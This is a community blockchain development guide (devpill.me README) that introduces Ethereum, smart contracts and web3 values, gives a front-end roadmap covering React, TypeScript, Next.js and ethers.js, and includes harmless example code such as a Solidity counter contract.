dcbuild3r/blockchain-development-guide;Disclaimer: this repo is not maintained with up to date content. Please visit devpill.me to read the newest version of this guide. DevPill.me - A Public Good Blockchain Development Guide Support this public good I'm trying to gather resources to fund the development of this public good blockchain development guide, and so I got my fren Ana Rueda (@ruedart) to create this amazing graphic for the Mirror NFT edition . The funds will go to the continued development of this guide (90%) and to Ana for the creation of the art (10%). I'm open to discussion on how to structure the open collaboration around the guide and on allocating the funds into a community-owned multi-sig. The goal is to use the funds gathered on Mirror, Gitcoin grants round 13 and elsewhere to incentivize developers to create sections through bounty submissions. If this idea doesn't gather appeal, then I will send the funds to the Gitcoin grants matching round so that other public goods get funded. Links to support the development of the blockchain development guide: Mirror NFTs Gitcoin grants (Gitcoin grants round 13 goes from March 9th - 24th, happens recurrently every 3 months) Community If you want to contribute to devpill or to discuss any of the topics and resources found in the guide, feel free to join our Discord , and follow us on Twitter and Lenster . This repo will not reflect any changes on the devpill.me website ; the repo for the site can be found here and content with the corresponding markdown files is located in this directory . Please submit PRs there instead as it makes it easier for me to process and review. Introduction Nowadays there are countless well-made resources on how to learn blockchain development of all kinds and with different specializations in mind; however, it is still very hard to get guidance and personalized suggestions based on your interests. I am writing this guide in order to provide an aggregator of all the resources that I've found over the years, plus give some opinionated commentary on how to approach them and how to use them to maximize learning and practical understanding, so that you can get building cool things in the space as soon as possible. This guide will focus on the Ethereum ecosystem as that's where most developers and applications are. If you are interested in other ecosystems that are non-EVM compatible and are not L2s on Ethereum, then check out their respective documentation or guides written by their developer communities. Examples of other non-EVM compatible blockchains that are popular are Solana (Rust/Anchor), Polkadot (Rust/Substrate), Cosmos, Terra, and others. Most of these blockchains do or will support the EVM stack through various initiatives like Neon EVM (Solana), Moonbeam/Moonriver (Polkadot/Kusama), EVMOS (Cosmos), etc. I really want this guide to become a community-sourced public good that everyone will be able to take advantage of. I will do my best to present it to the wider blockchain developer community to get constructive feedback, proofreading help, and insight into how to make it the best guide available. What is blockchain development? There are two main categories in my mind: either you build the infrastructure that runs blockchain-based networks, or you build applications that run on top of these decentralized and permissionless networks. Of course, this differentiation doesn't encompass all types of development on blockchains, but it is a good way to get started.
Core blockchain development By blockchain infrastructure, people usually mean client implementations of blockchain protocols that nodes or validators run to keep the chains running. These clients are usually focused on distributed ledger technology, networking, virtual machines, and various other low-level types of engineering. The client is what enforces the rules of the blockchain protocol: it runs the consensus mechanism, executes all transactions in the network, makes sure all nodes are in sync, and more. This is also known as core blockchain development, which is not what most devs picture when thinking about blockchain or web3 development in general. There are various niches within blockchain development itself as well; you can focus on improving execution capabilities with technologies like rollups, validiums, or volitions, you can improve decentralization and security guarantees by innovating on the consensus layer of the protocol, etc. Blockchain API There's also blockchain infrastructure that supports the application layer by providing APIs to access blockchain data, like oracles for smart contracts, indexing services for back ends, libraries that allow you to call and listen to smart contract events, decentralized storage services, and more. There are applications that aggregate data from different smart contracts, transactions, and events on the blockchain to provide useful insight; these apps are mostly centered around data analysis and are not necessarily decentralized, but they require an understanding of the underlying blockchain-based technologies. Blockchain application layer The most popular type of blockchain development is on top of the application layer. Building decentralized applications (Dapps) can take many different forms, but it usually involves a smart contract and a user interface that interacts with that smart contract and listens to changes in the state of the blockchain. These applications can serve various use cases and can be used to build decentralized financial services, games, and so much more. If these concepts are completely foreign to you, I suggest reading the how to get started section first, or Google the words you may not understand. Specializations There are many different specializations within blockchain development, and each requires a different set of skills; however, a general understanding of distributed systems, basic cryptography, and knowing how smart contracts operate is required as a foundation for all of them. In this guide I'll try to provide a general overview of each of them, as well as give the best guidance I can provide on the resources learners should prioritize and in which order they should take them. There are many roles that I'm not as familiarized with, so feel free to suggest pull requests with changes or DM me with suggestions. Skill-based There are different sets of skills required for different specializations; the technology stack and knowledge needed are determined by the layer and application that you want to target as a developer. I believe that everyone should get a solid general foundation and try out different areas and niches before settling on the main stack they want to focus on. Some people choose specializations according to the end goal that they want to accomplish using blockchain-based technologies; others, like myself, feel like everything is interesting and can't settle on a single one to specialize in when confronted with an analysis-paralysis situation.
This guide will cover these main tracks; however, anyone is free to submit a pull request to add more or expand on the already existing ones:

- Frontend development
- Smart contract development
- Backend blockchain development
- Core protocol development
- Full-stack blockchain development
- Cryptography

Coming soon:

- Security engineer
- MEV searcher
- Cryptography
- Blockchain data analytics

Application-based Another way to separate types of blockchain development is not based on the underlying tech stack, but on the use case that you are targeting. These are the categories that I believe are the most popular; however, there are many others that I'm not covering to keep the scope of this article more manageable. Coming soon:

- DeFi
- Creator Economy
- MEV
- L2s
- Infrastructure
- Gaming
- Privacy
- Coordination / Public goods

Non-technical sections:

- Getting a job
- Social Capital
- Mastery
- Community

How to get started? No matter if you are a beginner programmer or if you've been coding for years, this guide will provide resources for all levels of expertise. If there is something that you already know in the specialization roadmaps that I have here, feel free to skip the material or use it as an opportunity to review what you already know and potentially fill in some gaps in your understanding. Blockchain development might seem very intimidating at first: there are many moving parts, foundational knowledge from various different fields is required, the technologies are constantly evolving and aren't as mature as in other areas of development such as the web development space, there is a financial aspect to almost every application as you are programming on top of a value layer, etc. However, it is not as hard as you might think. Once you get familiarized with the basics, understanding everything else that is going on is usually just a matter of applying a general understanding to a specific situation. If you build a strong foundation then it will be much easier to process more complex topics and reason about problems relating to a new subject matter. If you have a background in computer science, mathematics, or any related field, then you will have a much easier time getting started with blockchain development, as many foundational concepts are abstractions of algorithms and data structures. If you are a complete beginner, then please make sure you take the initial few steps with patience so as to not feel overwhelmed. Once you start familiarizing yourself with the material, you will start to feel like it is more manageable. General foundation In order to get started with blockchain development, one must first understand how blockchains work, in order to build a mental model of how each moving piece works and to get an understanding of the design principles which will govern your development experience. Blockchains The term blockchain has two different meanings: it can either relate to a data structure or to a computer network. A blockchain (data structure) consists of sets of transactions or data bundled inside a container, where each container (block) has a cryptographic hash of the data in the previous container within it. If the contents of the previous block change, the hash changes as well, and thanks to this feature we can ensure that the data hasn't been tampered with. The second consequence of the blockchain data structure is that it is append-only.
You can't prepend data to it, nor modify the data already within it, as that would alter the hashes of all the blocks succeeding the ones that have been modified. This is why we call blockchains immutable. A blockchain (network) is a network of computers that have a synchronized ledger of transactions, which uses the blockchain (data structure) for storing data (usually inside of merkle/verkle trees). The blockchain is powered by miners/validators which operate under a so-called consensus algorithm; this algorithm helps coordinate who produces and organizes blocks, as well as indicating which is the longest chain by continuously updating the head of the blockchain. Blockchains have 3 main properties which they try to optimize for: security, decentralization, and scalability. They achieve security and decentralization through their consensus algorithm, where many different parties need to either provide resources, mostly in the form of running expensive operations on massive hardware facilities with Proof-of-Work (PoW), or stake economic resources in the network with Proof-of-Stake (PoS). The more participants, and the more distributed the power dynamics among those participants, the more security and decentralization. There are many other features that contribute to decentralization, like client software which is able to run on consumer hardware so that anyone can synchronize the state of the blockchain in their nodes, minimizing how many transactions you can process per block so as to not make the state too big, and much more. Further reading In order to understand how blockchains work beyond my simple explanation here, read and watch the following resources:
- Blockchain Explained - Investopedia
- Blockchain 101 - Anders Brownworth
- But how does Bitcoin actually work? - 3Blue1Brown
- Optional (cultural significance): Bitcoin whitepaper

Ethereum Since this is a guide about blockchain development on Ethereum, it is required to know how the Ethereum blockchain works, and the changes that it will undergo in the future, so as to be prepared for what's to come as a developer. If you have done web development before, you can think of these changes as a new ECMAScript standard, a new browser compile target (i.e. WASM), a new engine (V8), etc. The Ethereum blockchain is constantly evolving, and quite a few changes will be put in place in the future before the core technologies of the network start to ossify. A good way to get started with how Ethereum works is to watch Austin Griffith 's ETH.BUILD YouTube playlist where he illustrates how various parts of the Ethereum blockchain work. "In the Ethereum universe, there is a single, canonical Turing-complete (computationally universal) computer (called the Ethereum Virtual Machine, or EVM) whose state everyone on the Ethereum network agrees on. Everyone who participates in the Ethereum network (every Ethereum node) keeps a copy of the state of this computer. Additionally, any participant can broadcast a request for this computer to perform arbitrary computation. Whenever such a request is broadcast, other participants on the network verify, validate, and carry out ("execute") the computation. This execution causes a state change in the EVM, which is committed and propagated throughout the entire network." (source: ethereum.org documentation ) In order to learn the basics of Ethereum, go through the ethereum.org documentation . Here are links for each section: Intro to Ethereum, Intro to Ether, Intro to dapps, Web2 vs.
Web3, Accounts, Transactions, Ethereum Virtual Machine (EVM), Gas (skip the Opcodes section, we'll revisit that later), Nodes and clients, Networks, Consensus mechanisms, Governance / EIP process. Ethereum roadmap - Endgame This graphic shows all the different changes which are being implemented to Ethereum in the upcoming years. It's not necessary to understand what this is all about, but it is good to know about. I suggest watching the video resource appended after the graphic to learn more about what these flowcharts mean. Further reading Ethereum Whitepaper Why Proof of Stake - Vitalik Buterin Smart contracts A smart contract is a program that runs on the Ethereum blockchain. It's a piece of code that has functions and data (state) which resides at a specific address on the Ethereum blockchain. Smart contracts are a type of Ethereum account, meaning that they have a balance and can send transactions over the network. They are deployed on the network and run as programmed; user accounts (externally-owned accounts, or EOAs) can interact with a smart contract by submitting transactions that interact with functions that are publicly accessible. Smart contracts can be used to define rules which are enforced via code, e.g. a smart contract that allows two parties to swap their tokens (like Uniswap). How do I create a smart contract? The most popular smart contract programming language which targets the Ethereum virtual machine is Solidity . It is a high-level language that was influenced by C++, Python, and Javascript, and so its syntax looks familiar. Solidity is statically typed and supports inheritance, libraries, user-defined types, and more. Solidity is a compiled language, which means that before having a runnable smart contract, a Solidity program needs to be run through a compiler that generates a low-level interpretation which is called bytecode. Bytecode consists of instructions that the EVM can understand and execute. There are other languages that can be used to target the EVM, like Vyper and Fe , that have their pros and cons; however, they don't have as robust development ecosystems and aren't as widely used by projects deployed in production. Here's what a simple counter program looks like in Solidity:
```js
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

contract Counter {
    uint private count;

    // Function to get the current count
    function get() public view returns (uint) {
        return count;
    }

    // Function to increment count by 1
    function inc() public {
        count += 1;
    }

    // Function to decrement count by 1
    function dec() public {
        count -= 1;
    }
}
```
In the beginning, you declare the version of Solidity you are using with the pragma solidity + version keyword. To indicate the creation of a contract you write it using the contract ContractName {} form. Within the contract curly brackets, the logic of the program is declared. We then declare a simple private variable named count with an unsigned integer type (meaning it can only hold non-negative integers). Private functions and state variables are only visible for the contract they are defined in, and not in derived contracts. Afterward, we declare three different functions: one to retrieve the value held inside of the count variable, one to increase the variable's value by one, and the last one to decrement its value. The public keyword specifies that the function can be called by any address on the blockchain (be it a smart contract or a user-owned account).
The view modifier specifies that the function doesn't alter the state within the contract (it only reads values already available). The returns keyword is used to specify the type of the object that is returned back by the function, the unsigned integer type in the case of the get() function. Everything which is written after a // is considered a comment and is ignored by the Solidity compiler. Comments are used to make the code more readable and manageable, which is especially helpful if you are working with teams or revisit a codebase after some time. They also act as documentation for what the code is doing. How do I compile and deploy my first contract? In order to compile and deploy our first smart contract, we will use the Remix IDE, which is a website where we can write smart contracts, compile them, and deploy them on a local instance of the EVM. We can also interact with the locally deployed smart contract to test out its functionality. To deploy our simple counter contract, go to Remix , add a new file in the contracts directory, name it Counter.sol , and copy-paste the code in the counter example . Now click on the second icon from the top in the selection bar on the left; it is the logo of the Solidity programming language and it symbolizes the Solidity compiler in Remix. In the compiler dropdown select 0.8.10, which is the Solidity version in our smart contract, and click "Compile Counter.sol". After you have compiled your contract, click on the third icon from the top; it should have the "Deploy & Run Transactions" name. Click "Deploy". After you have deployed, you should see a list item with "> COUNTER AT 0x.... (MEMORY)". You've successfully compiled and deployed your first smart contract! Now that you have it deployed, you can interact with it by calling the inc() or dec() functions to increase or decrease the value of the count variable. You can call the get() function to retrieve the value of the count variable. We will go into a lot more depth on how smart contracts are programmed, tested, and deployed in the smart contract development section. Web 2.0 Although blockchain developers build decentralized applications, the technologies used to build these applications overlap to a big extent. User interfaces for Dapps are hosted on the internet and are built with traditional web technologies. In order to interact with a smart contract, a user needs to submit a request to a server that hosts an application; that application needs to create a transaction, get the signature from a user via a web3 wallet like Metamask, and then submit the transaction to an Ethereum RPC. The transaction then goes to the mempool, gets picked up by a miner (PoW) / validator (PoS), gets executed and included in the blockchain, and the user interface updates once the contract emits an event signalling a successful function call. This is the usual flow that decentralized applications have (a minimal sketch of this flow in code appears at the end of this section). Any blockchain developer that wants to build full-stack applications needs to know how the internet and its most important protocols work, as well as how to build user interfaces for all the major platforms (web, mobile, etc). You can think of web3 as adding a native value layer to the internet; it also helps with social coordination and resource allocation with the decentralized autonomous organization structure. It is very helpful to know how the web and the existing technologies built on top of it work, and to understand how crypto and web3 work, in order to create better applications.
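To make the Dapp flow described above concrete, here is a minimal sketch in JavaScript using the popular ethers.js library (v5-style API) against the Counter contract from earlier. The contract address is a placeholder, and a browser wallet like Metamask is assumed to be injected as window.ethereum.
```js
// A minimal sketch of the dapp flow, assuming ethers.js v5 and an injected
// browser wallet; the contract address below is a placeholder.
import { ethers } from "ethers";

const counterAbi = [
  "function get() view returns (uint256)",
  "function inc()",
];

async function incrementCounter() {
  // The wallet provides the connection to an Ethereum RPC and signs transactions
  const provider = new ethers.providers.Web3Provider(window.ethereum);
  await provider.send("eth_requestAccounts", []); // prompt the user to connect
  const signer = provider.getSigner();

  const counter = new ethers.Contract("0xYourCounterAddress", counterAbi, signer);

  const tx = await counter.inc(); // the wallet pops up asking for a signature
  await tx.wait();                // resolves once the transaction is mined

  console.log("new count:", (await counter.get()).toString());
}
```
The wallet handles key management and signing, while the library turns the function call into a transaction and submits it to an Ethereum RPC, which is exactly the flow outlined above.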
I believe that even though you might not work with developing front-ends, it is still good to know how they work on a foundational level, as in almost all kinds of development you'll interface with the web in some form. A good learning roadmap for the basics of how web technologies work is the initial steps of the roadmap.sh frontend roadmap. It is also a must to learn how to version control your code; Git is the most popular version control and collaboration software, along with GitHub / GitLab for hosting repositories and interacting with other coders. Learning resources:
- How does the internet work
- CS50 HTTP lecture (the CS50 course on edX is a great intro into computer science)
- freeCodeCamp - Here you can learn the basics of how HTML, CSS and JS work. Unless you're planning to write frontend interfaces you won't need it, but it's still good to experiment and learn how it works.

What makes decentralization important? In the web 2.0 world, we're used to having a main account on platforms like Google and Facebook which we use to log into other services. All of our data is hosted inside of centralized databases and our private information is used in advertising software to sell us products. In exchange for our data, we get free services. These big centralized entities have a lot of power and control over our daily lives through the products we use each and every day. This is the business model which has worked for the past few decades. When you decentralize these services and become a sovereign user, you can't be de-platformed, censored, or exploited. As long as you have access to a computer and to the internet, you can use any application running on a permissionless and decentralized blockchain. Nobody can fundamentally block access to them, because you can always run a node, call a smart contract, and submit a transaction in the blockchain network. Decentralized applications are still in their infancy and many technologies are still not mature enough to support mainstream adoption; however, there is a huge demand for these applications and the industry is evolving rapidly. In a web3 world, users own their assets, their money, their identity, and their data. This allows for a fundamentally better user experience, and eventually a practically better one once these technologies become mature enough to support the masses. You can eventually have applications like decentralized social networks where users own their content, artists and musicians can produce their artwork and sell it as NFTs, get revenue from royalties, and engage better with their audiences, you can have virtual worlds where people own their digital identity, their virtual items, and their land, etc. The possibilities in web3 are growing day by day and I think it is one of the most exciting technologies that humankind has ever devised. It unlocks so much potential. Web3 values The web3 movement is one about creating a value layer for the internet where we can set up incentive structures for the betterment of society, in order to make a fairer world where access to products and services is openly distributed, permissionless, and accessible to everyone on the planet no matter their provenance. There are many good initiatives like Kernel , Gitcoin , GreenPill and many others that try to help educate about and fund the new wave of public goods and infrastructure in order to create a better world.
As a blockchain developer, it is good to get a feeling for why these systems are built in the first place and for the values that the products and services we create embody, so as to not recreate the centralized web2 world we currently have. In order to learn more about web3 values and how we can create a fairer world, go over Kernel's web3 lessons.

Play around

Blockchain development might feel overwhelming, and frankly very intimidating, when you are starting out. To remedy this feeling, I suggest you look at programming on blockchains like an adventure game. You can explore what is possible, experiment by creating small projects with technologies that you find interesting, look at what other people are building, interact with their applications, debate with various people about their favorite applications and technologies, and get a feel for how everything works.

As you progress through this guide, you'll start going deeper into various different fields. There is a myriad of interesting primitives in web3 and types of applications you could build, so picking what to specialize in is very hard unless you have a clear goal in mind from the get-go, which is quite rare. I personally think that trying everything that interests you, even if only for a short while, can give you a glimpse into each field and insight into whether you'd like to focus on that particular area. For this I suggest getting into different developer and research groups and talking about what it is like to build those things, what types of problems you would be working on, how one gets better in that field, what there is to work on, etc.

One of my favorite such groups is Newt, which is Aave's experimentation branch. Newt is completely community-driven and tries to promote open-source experimentation where the community is welcome to contribute to existing experiments or create their own. Here you can meet like-minded developers, build cool projects, and explore different areas of development and different fields within web3 such as DeFi, NFTs, and more. DeveloperDAO and EthernautDAO are also good developer communities where you can search for like-minded individuals, explore what's possible in web3, and potentially even get full-time job offers.

Connect

Blockchain development is a fairly new field, so most information about how to build applications in web3 is available on the internet rather than in universities and other educational institutions. This might make it a lonely endeavor, but it need not be! There are people all across the world learning how to build cool projects with these technologies, and everyone is looking to learn from each other and make friends in the space. As mentioned before, join DAOs and groups like Newt, DeveloperDAO, EthernautDAO, etc, talk about your learning journey on Twitter, and try to provide insight into your experience with learning these technologies. You're bound to find like-minded individuals with whom you can share your interests. It also helps a lot with learning the material: when you have to explain a complex topic to a person without prior knowledge, it forces you to understand your subject very well in order to explain it simply. Pair-programming or pair-learning is also a good way to cement new learnings.
Personally, I found that making friends online who are also into blockchain development is what made it the most fun and engaging for me, and it is helping me stick with the material for longer periods of time than I otherwise would have. Twitter is currently the platform where most builders, researchers, and creators share their insights in the realm of blockchain and web3, so it is almost a must if you want to keep up with the newest technologies. I also recommend not overdoing social media, as it can lead to a drastic decrease in productivity. It's a balance that needs to be achieved over time; a good tip is to have a clear goal in mind whenever you want to check Twitter or Discord, e.g. "I want to learn what new gas optimizations my friends have come up with". I also recommend creating lists with different types of people so you can sort by the type of content you want to see (DeFi, NFTs, MEV, smart contracts, frontend, design, etc). Bookmarking is also a good feature if you want to revisit interesting tweets in the future.

Another great way to meet devs is to go to hackathons and conferences. If you can afford to go to events then definitely do; however, if you don't have enough funds there are oftentimes grants for first-time attendees through places like PadawanDAO and others. Usually asking around to volunteer will get you free entrance, and people are usually kind enough to pool funds to sponsor people looking to get into the space who don't have the means to travel by themselves. In-person events like hackathons are a great way to develop your skills and meet people. They are where many projects that are popular today were started and where founders of projects usually meet for the first time. As for events worth going to in 2022, I suggest Devconnect (Amsterdam), ETHPrague, ETHCC / ETHParis, and Devcon (Bogota). Here is a good list of Ethereum-related events in 2022; there are events on pretty much every continent, as well as small local events that different communities organize, so look for events near you that might be related to blockchain development in some way, or start one yourself! I also recently started creating a Twitter list with blockchain devs that I think you should follow if you want to learn blockchain development. It is a running list, so feel free to DM me devs I should add and I'll consider adding them to the list.

Build

The next and final step to get started with blockchain development should be obvious by now: it is to actually start building! After you've gone through the introductory foundational material in the sections above, you are ready to get going with one of the specializations listed below. If you are not sure which one you're into yet, just go with full-stack blockchain development and you'll get to try a bit of everything! Start writing code, no matter how bad it is, and try to get feedback on it from devs that know more than you do. Go through the roadmap that I have specified below: learn a concept, take notes, build something around it, do some testing, and move on. If there is something that catches your attention, then try building something with it and see where it takes you. Your own curiosity and interest are your best friends when learning blockchain development. You should constantly ask yourself why the thing you wrote worked and how you could make it better; if you can't come up with an answer, ask someone for an explanation or for a code review.
It is also good to review quality code written by other teams. If you are learning Solidity, for example, the best way to learn advanced Solidity is to read production codebases like Aave v3, Uniswap v3, Balancer v2, etc. The same principle applies to other categories and specializations as well.

Once you build something, share it with the world (unless it's a very profitable MEV bot)! Sharing it on Twitter and different Discords will bring attention to what you're doing, and you might get constructive feedback and/or meet new friends who are interested in what you are building. If you are building something more complex, try creating documentation for it or add some useful comments if you expect other people to read your code. It is also great to make your code publicly available on hosting platforms like GitHub to build a portfolio of projects which you can show when applying for job positions. I'll revisit how to get employment in web3 in a later section.

Skill-based development

Now we get down to different specializations. Before looking at the different paths you can take, make sure you've gone through the Foundational section. I also suggest reading the introduction to each specialization in both the skill-based development and application-based development categories, so that you have a better idea of what's out there and what you might find interesting before going deeper into any specific one. This section will focus on categorizing specializations in blockchain development with regard to the skill sets required within them.

Front-end development

Front-end (FE) development is highly reminiscent of traditional web ("Web2") development. This includes the technology stack involved in building out user interfaces connected to blockchain technology. Just like in traditional environments, FE blockchain developers are expected to fetch data and interact with APIs in order to produce a seamless user experience on a decentralized application. As a result of the overlap in these core competencies, front-end developers are able to leverage a mature ecosystem of tried and true languages, libraries, and various other tools that will be covered in this section. These similarities also contribute to a much more frictionless onboarding process for developers who are new to frontend development: they can tap into a mature ecosystem composed of developers who eagerly impart their knowledge via platforms such as StackOverflow, along with an abundance of well-produced tutorials and documentation for grasping these well-established technologies. Such maturity is not the norm in a rapidly emerging ecosystem like web3, which makes frontend development the most popular choice amongst those new to blockchain technology.

The key principles of front-end development include knowing how to structure and style websites, how to make them dynamic with JavaScript and different frameworks, how to manage state within applications, basic design, how to fetch data from APIs and databases, and how to create good web3 user experiences regarding wallets and the interactions with the smart contract backend of your application.
One of the biggest differences in web3 FE development is user authentication: instead of logging in with your email and password or your Google account, you log in with your wallet using a third-party application like Metamask or WalletConnect, and protocols like ENS to display information about the user (provided they have an Ethereum domain). If a smart contract contains state which represents past interactions with the application by the user, you also need to fetch historical data from the blockchain on-demand or maintain a local database with indexed data which is easily queryable by the FE of the application.

As a front-end blockchain developer you need to know what a Contract Application Binary Interface (ABI) is in order to be able to interact with smart contracts on the Ethereum blockchain or on an L2 like Optimism, Arbitrum, Starknet, or ZkSync, which are Ethereum-based scaling solutions that we'll cover in the L2 section. You also need to query data from various APIs to accurately display the price of various assets (if applicable), the user's balance of ERC20 tokens or NFTs, and various other data you might need from either the blockchain itself or an external database.

Another interesting aspect of programming decentralized applications is the need to build applications that are not hosted on a centralized server. To remedy this problem, many developers open-source their web interfaces and host many instances of those interfaces on decentralized storage solutions like IPFS, Arweave, and others. In this way, if one of the servers hosting the interface to interact with the smart contracts goes down, users can interact with it from many other different places. It's also amazing that, since the functions can be called by anyone, users can interact with decentralized applications from completely different frontends as long as they have the ABI. This allows for massive composability, which we'll cover a bit later.

This roadmap will focus on the frontend technologies that I've seen used most in blockchain development today. I've used the roadmap.sh frontend roadmap, a friend's tech stack, and my experience as a reference for creating this specialization. If you are a more experienced reader, feel free to suggest pull requests to add/edit/remove content, or you can suggest changes by DMing me on Twitter or Telegram (@dcbuild3r).

HTML, CSS, JS, Web APIs

The pillars of web development technologies are HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript (JS), and web application programming interfaces (APIs). HTML is the language that is used to structure websites; with HTML you can insert text, images, and videos, create different sections for your website, create links to other sites, and more. CSS is a styling language that helps you edit how your HTML elements look, how they are displayed, and how they are arranged on your screen. It is also what makes user interfaces responsive for different devices like mobile, tablet, laptop, desktop, and others, by providing mechanisms which dynamically resize your HTML elements based on the width and height of the screen a specific user has. JavaScript is a programming language that makes your HTML elements dynamic; it allows for things like complex animations, dynamic formatting of elements depending on given inputs, state management within your application, and much more utility thanks to its programmability.
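As a tiny illustration of that dynamism, here is a hypothetical TypeScript snippet (which compiles down to plain JavaScript) that updates an HTML element in response to user input; the element ids are made up for the example:

```typescript
// Assumes an HTML page containing <span id="count">0</span> and
// <button id="inc">Increment</button>.
let count = 0;

const countEl = document.getElementById("count") as HTMLSpanElement;
const buttonEl = document.getElementById("inc") as HTMLButtonElement;

// Re-render the span every time the button is clicked.
buttonEl.addEventListener("click", () => {
  count += 1;
  countEl.textContent = String(count);
});
```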
HTML, CSS, and JavaScript are the only 3 technologies that browsers understand; the rest of the technologies mentioned in this specialization end up compiling to an optimized HTML, CSS, and JS bundle which the browser can process and interpret. The best place to learn the basics of web development, in my opinion, is freeCodeCamp, where you can do the lessons in the first two sections named "Responsive Web Design" and "JavaScript Algorithms and Data Structures". It says that each section takes about 300 hours, but usually you can do it in much less, since that's a conservative estimate. After you've gone through these two sections and built the initial projects that are required to fulfill them, you can move on to learning React.

React

In modern web development you'll almost never write vanilla HTML, CSS, and JavaScript to build your websites. Web developers learn a view framework that helps them better structure their code with components and also optimize the way in which components are rendered and how changes to the state of the application affect what the users see. The most popular web development framework is React, by a wide margin over Vue.js. React was originally developed by the Facebook team, but was open-sourced early on and now has thousands of contributors and many full-time maintainers who are constantly pushing the framework forward.

Most of the user interfaces for blockchain applications are programmed using React, and there are many React component libraries that you can reuse from the community to perform common tasks like logging in with an Ethereum wallet or switching networks, as well as so-called React hooks libraries (i.e. eth-hooks) which let you fetch different data like balance, block number, prices, and more.

I believe that React is best learned from the official documentation, but there are also other resources for people who learn better with video content. Here is a list of React learning resources that I recommend:
- React in 100 Seconds - Fireship
- React roadmap
- Official React documentation
- awesome-react - This GitHub repository aggregates many useful resources for React developers; it has tutorials, tooling, component libraries, frameworks, design patterns, guidelines, and much more. It is a good place to look for inspiration and resources when using React.
- If you want a paid video course I can recommend either ZTM's React course or Maximilian Schwarzmuller's React course. On Udemy there are sales periods every once in a while which allow you to buy courses for $15 instead of $200, so wait for one of those; never buy at the full price.
- freeCodeCamp React course on YT - Learn React for free

Once you feel you've understood how React works and have learned about lifecycle methods, hooks, how to pass down data through props, how to use the Context API, etc., I recommend trying to build the front end of a web3 app like Uniswap or an NFT marketplace like OpenSea. To rapidly prototype the design I recommend using tailwind.css and Chrome browser developer tooling to inspect the styles of the site you're trying to recreate. Also, don't forget to use CSS flexbox/grid where necessary. Try to simulate the data inside of these apps using hardcoded JSON objects.

Typescript

Typescript is a superset of JavaScript which allows you to statically type JavaScript code. This means that you declare the types of variables (integer, string, ...).
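For example, when simulating app data with hardcoded JSON as suggested above, TypeScript lets you describe its shape so the compiler catches mistakes before the browser ever runs the code (the TokenBalance type here is just an illustrative name):

```typescript
// Describe the shape of the data your UI expects.
interface TokenBalance {
  symbol: string;
  amount: number;
}

// Hardcoded stand-in for data you would later fetch from a contract or API.
const balances: TokenBalance[] = [
  { symbol: "ETH", amount: 1.5 },
  { symbol: "DAI", amount: 250 },
];

function totalValue(balances: TokenBalance[], prices: Record<string, number>): number {
  // The compiler flags typos like b.amont or a wrongly typed price map at build time.
  return balances.reduce((sum, b) => sum + b.amount * (prices[b.symbol] ?? 0), 0);
}

console.log(totalValue(balances, { ETH: 3000, DAI: 1 }));
```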
It allows for a better developer experience, as the Typescript compiler can catch many errors ahead of time by checking the types of objects before the code ever runs. It also lets developers tap into extra features on top of JavaScript, allowing them to write more expressive code. Remember that Typescript cannot be run by the browser and needs a compiler to convert TypeScript code into runnable JavaScript.

Typescript is widely used by the web-development community thanks to features that improve security and readability, allow for a better development experience inside of the IDE with autocompletion, and add cool new syntactic sugar on top of JavaScript. I recommend going to the Typescript documentation; it is good to get into the habit of going to official documentation, since it is usually the right place to visit when you are learning a new technology. Once you have the basics down, try building a simple application with it or refactor an existing application in a way that uses the technology that you are learning.

Next.js

Next.js is a React framework that enables server-side rendering and static site generation, does smart bundling and route pre-fetching, and a lot more. Next.js is able to heavily optimize your websites by only loading what you need on-demand instead of having to load up the entire site at the beginning. It also allows for a much better experience with creating API routes thanks to its file-system routing feature, it optimizes images, it has Typescript support, it has an internationalized (i18n) routing API, and a lot more.

Learning resources:
- Next.js documentation
- awesome-nextjs

Moralis

Moralis is a web3 development platform that helps abstract away the pain of having to build all the backend infrastructure needed to run web3 applications from scratch. Moralis provides an easy-to-use API that lets you fetch any data that you want from various blockchains, handles web3 user authentication, allows you to listen to smart contract events in real time, gives you access to historical data, has support for cloud functions, and much more. If you've never worked with blockchains, it is the best way to get onboarded and start building web3 applications, as the Moralis SDK is intuitive to use for anyone that has experience with JavaScript/TypeScript.

Learning resources
- Moralis documentation
- Moralis YT channel

Web3 libraries

Ethers.js is one of the most popular libraries for interacting with the Ethereum blockchain and its ecosystem. Smart contracts that are deployed on the Ethereum blockchain have functions that can be called externally by any other account on Ethereum, be it an externally owned account (EOA = user wallet) or another smart contract. Many of these functions require certain parameters to be fed into them; they also often rely on external state like prices of tokens on the blockchain, balances of the user's wallet, and more. Ethers.js is what allows a user interface to call these functions: users can input certain information in the frontend of your application, and that information can be put into the function call of the smart contract. After the transaction is broadcast, the EVM will try to execute that function call; if no check inside of the function raises an error, it will execute, otherwise the transaction will revert. Ethers.js is currently the most popular Ethereum library among developers, but there are alternatives like web3.js, web3.py, Brownie, and many others.
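As a sketch of what a read-only call looks like (assuming ethers v5, a public RPC endpoint, and the standard ERC20 balanceOf function; the URL and addresses are placeholders):

```typescript
import { ethers } from "ethers";

// Human-readable ABI fragment: ethers derives the encoding from the signature.
const erc20Abi = ["function balanceOf(address owner) view returns (uint256)"];

async function readBalance() {
  // A read-only provider is enough; no wallet or signature needed.
  const provider = new ethers.providers.JsonRpcProvider("https://rpc.example.org");
  const token = new ethers.Contract("0xTokenAddress...", erc20Abi, provider);

  // The call is executed by the node against current chain state.
  const balance: ethers.BigNumber = await token.balanceOf("0xUserAddress...");
  console.log("raw balance:", balance.toString());
}

readBalance().catch(console.error);
```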
The second most popular library is web3.js, the Ethereum JavaScript library that has been around the longest. For a comparison of ethers.js and web3.js, read this article written by the Moralis developer team.

Learning resources
- ethers.js documentation

Web3.js is a collection of libraries that allow you to interact with a local or remote Ethereum node using HTTP, IPC or WebSocket. The web3 JavaScript library interacts with the Ethereum blockchain. It can retrieve user accounts, send transactions, interact with smart contracts, and more.

Learning resources
- web3.js documentation

Design

As a front-end developer, you need to focus on how your application looks and how it feels to use it. A big part of that is design: before building a website, you should prototype how you want it to look, design how your users will interact with your application, consider how that fits the use case of your application and what you want to accomplish with it, and figure out how to make your users enjoy using it. UI/UX is a specialization of its own, but every single front-end developer should have strong foundations in UI/UX regardless. Most big teams will have designers who prototype applications using tools like Figma, Framer Motion, and various others. As a front-end developer, your task is to turn those designs into functioning code, hook all of the components up to the necessary APIs and databases, and build the functionality of the application. One of the most popular tools to prototype and design websites is Figma, so every FE developer should know how to use the application.

Learning resources
- freeCodeCamp Figma YT course

Web3 templates

